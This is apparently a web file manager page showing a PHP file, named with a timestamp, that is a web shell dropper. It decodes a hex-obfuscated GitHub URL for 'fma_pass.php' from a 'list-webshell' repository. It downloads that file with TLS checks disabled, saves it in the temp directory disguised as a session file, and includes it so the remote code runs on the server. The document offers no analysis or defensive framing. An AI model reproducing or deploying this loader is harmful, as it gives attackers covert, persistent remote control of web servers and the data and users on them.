Edit File: 1609522785.php
<?php function gets($url) { $check = ini_get('allow_url_fopen'); if($check == 1) { $output = file_get_contents($url); }else { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $out = curl_exec($ch); $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($statusCode == 200) { $output = $out; }else { echo "cURL error: " . curl_error($ch); } curl_close($ch); } return $output; } $start_dir = getcwd(); $name = sys_get_temp_dir() . "/sess_50e0c7d8ad19848483484552314e38de"; if(!file_exists($name)) { file_put_contents($name, gets(hex2bin("68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f68656b65722d70726f2f6c6973742d7765627368656c6c2f726566732f68656164732f6d61696e2f666d615f706173732e706870"))); } include $name; chdir($start_dir); ?>
Back